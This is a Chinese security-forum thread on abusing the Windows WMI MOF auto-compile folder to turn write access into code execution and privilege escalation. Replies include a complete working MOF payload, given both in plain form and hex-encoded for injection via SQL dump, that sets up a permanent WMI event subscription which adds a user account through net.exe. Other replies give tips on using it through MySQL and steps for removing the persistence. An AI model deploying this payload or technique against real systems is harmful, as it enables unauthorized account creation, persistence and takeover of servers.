windows写权限变成可执行权限的利用

  • A+
所属分类:WooYun-Zone

Windows 管理规范 (WMI) 提供了以下三种方法编译到 WMI 存储库的托管对象格式 (MOF) 文件:

方法 1: 运行 MOF 文件指定为命令行参数将 Mofcomp.exe 文件。

Method2: 使用 IMofCompiler 接口和 $ CompileFile 方法。

方法 3: 拖放到 %SystemRoot%\System32\Wbem\MOF 文件夹的 MOF 文件。

Microsoft 建议您到存储库编译 MOF 文件使用前两种方法。也就是运行 Mofcomp.exe 文件,或使用 IMofCompiler::CompileFile 方法。

第三种方法仅为向后兼容性与早期版本的 WMI 提供,并因为此功能可能不会提供在将来的版本后,不应使用。

很多测试的时候会用得到吧,另外感觉应该有其他很多地方得机制可以导致自动启动?

http://support.microsoft.com/kb/245773/zh-cn

  1. 1#

    Sunshine (0123456789) | 2012-12-04 12:32

    我想到了提权

  2. 2#

    hongygxiang (屌丝,纯屌!) | 2012-12-04 12:33

    楼主好淫荡。

  3. 3#

    se55i0n (那些年,我们一起看的岛国动作片~) | 2012-12-04 12:40

    好吧~看到1#~我想到了提权~

  4. 4#

    情深 (ส็็็็็็็็็็็็็็็็็็็็็็็็็) | 2012-12-04 12:42

    貌似最近的mysql漏洞就是用来第三种。。。

  5. 5#

    cnrstar (Be My Personal Best!) | 2012-12-04 13:42

    还是剑老大犀利,已经发了
    就像文中说的,2003下提权好用,2008后续版本不再支持第三种方法,然后就不行了。

  6. 6#

    鬼哥 | 2012-12-04 15:24

    @xsser 我现在只想知道怎么停止已执行的mof,昨天测试的时候放了个.mof到C:\WINDOWS\system32\wbem\mof\ 从昨天晚上一直到现在还在每过5秒就执行次 加个用户,搞的我郁闷死了。。。

    昨天听 B1n4ry 说把net stop winmgmt 服务停止后,然后在删除了加进去的.mof OK 没继续执行了,,但是我怕服务器出现问题又把winmgmt 服务启动了, 邪恶 又开始5秒后自动加用户!

    咋办。。

  7. 7#

    xsjswt | 2012-12-04 15:50

    @xsser 可写要变执行挺简单的,各种自启动,各种写hive

  8. 8#

    xsser | 2012-12-04 16:01

    @鬼哥 这文件删除了成么?

  9. 9#

    鬼哥 | 2012-12-04 16:14

    @xsser 不成,,刚baidu了下 找到了方法停止。。

  10. 10#

    xsser | 2012-12-04 16:31

    @鬼哥 那你也回复下啊

  11. 11#

    whking (不登高山,不知天之大。) | 2012-12-04 17:16

    @鬼哥 删除C:\WINDOWS\system32\wbem\mof\good 添加的mof后,在启动winmgmt 没出现加账户啊!
    C:\Documents and Settings\Administrator>net stop winmgmt
    Windows Management Instrumentation 服务正在停止.
    Windows Management Instrumentation 服务已成功停止。
    C:\Documents and Settings\Administrator>net start winmgmt
    Windows Management Instrumentation 服务正在启动 .
    Windows Management Instrumentation 服务已经启动成功。

  12. 12#

    鬼哥 | 2012-12-04 18:40

    @whking 你这个方法不行, 删除C:\WINDOWS\system32\wbem\mof\good 添加的mof后 启动服务后还是会继续加用户 不相信可以叫各位集友试下。。

  13. 13#

    鬼哥 | 2012-12-04 18:43

    @xsser 我错了,,,正确的方式是:
    第一 net stop winmgmt 停止服务,
    第二 删除文件夹:C:\WINDOWS\system32\wbem\Repository\
    第三 net start winmgmt 启动服务

    第四:完毕不会在执行了。C:\WINDOWS\system32\wbem\Repository\ 放的是储存库 我们执行的.mof都会被加入到这个库了。然后一直按脚本设置的时间执行。。 删除后 重新启动 会重建个默认储存库 这样我们先前执行mof就没了。

  14. 14#

    solihat (xxooooxx) | 2012-12-04 19:42

    有一个提权的思路

  15. 15#

    xsser | 2012-12-05 11:01

    windows写权限变成可执行权限的利用

  16. 16#

    softbug (算了,我还是做好我自己的东西) | 2012-12-05 11:28

    感谢群里的vka0n0

    #pragma namespace(“\\\\.\\root\\subscription”) instance of __EventFilter as $EventFilter {EventNamespace = “Root\\Cimv2″;Name = “filtP2″;Query = “Select * From __InstanceModificationEvent ” “Where TargetInstance Isa \”Win32_LocalTime\” ” “And TargetInstance.Second = 5″; QueryLanguage = “WQL”;}; instance of ActiveScriptEventConsumer as $Consumer {Name = “consPCSV2″;ScriptingEngine = “JScript”; ScriptText = “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user ftp test /add\”)”;}; instance of __FilterToConsumerBinding {Consumer = $Consumer;Filter = $EventFilter;};

  17. 17#

    softbug (算了,我还是做好我自己的东西) | 2012-12-05 11:29

    感谢暴暴,

    0x23707261676D61206E616D65737061636528225C5C5C5C2E5C5C726F6F745C5C737562736372697074696F6E22290D0A696E7374616E6365206F66205F5F4576656E7446696C74657220617320244576656E7446696C7465720D0A7B4576656E744E616D657370616365203D2022526F6F745C5C43696D7632223B4E616D6520203D202266696C745032223B5175657279203D202253656C656374202A2046726F6D205F5F496E7374616E63654D6F64696669636174696F6E4576656E742022200D0A22576865726520546172676574496E7374616E636520497361205C2257696E33325F4C6F63616C54696D655C2220220D0A22416E6420546172676574496E7374616E63652E5365636F6E64203D2035223B0D0A51756572794C616E6775616765203D202257514C223B7D3B0D0A696E7374616E6365206F66204163746976655363726970744576656E74436F6E73756D65722061732024436F6E73756D65720D0A7B4E616D65203D2022636F6E735043535632223B536372697074696E67456E67696E65203D20224A536372697074223B0D0A53637269707454657874203D202276617220575348203D206E657720416374697665584F626A656374285C22575363726970742E5368656C6C5C22295C6E5753482E72756E285C226E65742E6578652075736572206674702074657374202F6164645C2229223B7D3B0D0A696E7374616E6365206F66205F5F46696C746572546F436F6E73756D657242696E64696E670D0A7B436F6E73756D65722020203D2024436F6E73756D65723B46696C746572203D20244576656E7446696C7465723B7D3B

  18. 18#

    cnrstar (Be My Personal Best!) | 2012-12-05 12:00

    差异备份是成功不了的。。o(╯□╰)o
    @xsser

  19. 19#

    f1eecy | 2012-12-05 12:24

    防范办法把Wbem\MOF文件夹设成只读就可以么?

  20. 20#

    xsser | 2012-12-05 12:29

    @cnrstar 嗯 得把前面的乱码处理掉

  21. 21#

    sec123 | 2012-12-05 14:43

    @xsser 请问如何去掉乱码。。

  22. 22#

    xsser | 2012-12-05 14:48

    @sec123 嗯 去掉不了 这图是转的群里的

  23. 23#

    open (心佛即佛,心魔即魔.) | 2012-12-05 15:09

    最重要的还是自动执行啊。这个很难过。

  24. 24#

    lion(lp) | 2012-12-05 15:47

    这个图片不是把FTP 这个用户删除了吗 ? 怎么还会有FTP 这个用户呢?

  25. 25#

    hongygxiang (屌丝,纯屌!) | 2012-12-05 17:41

    @lion(lp) 应该是把ftp这个用户删除后,又跑了一遍sql。方便演示吧。
    我失败了,各种求解释。

  26. 26#

    Coody | 2012-12-05 19:03

    好吧,我测试也是失败的。。。。。o(╯□╰)o

  27. 27#

    lion(lp) | 2012-12-05 19:08

    我也是各种失败的。。。不知道为啥了  @hongygxiang

  28. 28#

    hongygxiang (屌丝,纯屌!) | 2012-12-06 12:19

    @鬼哥 坐等大牛前来指导

  29. 29#

    jk_影 | 2013-01-07 10:33

    2008的机器直接导出到目录下面,怎么让这个执行呢?

  30. 30#

    ramos | 2013-10-22 21:31

    @jk_影 2008不是就不可以了吗?我在xp上就不行,可以dumpfile到C:\WINDOWS\system32这个目录里,不能dump到webem及其以下目录,而且说是2008不再支持拖动直接运行这种形式。

  31. 31#

    El4pse | 2013-10-22 21:41

    make下下次碰到能用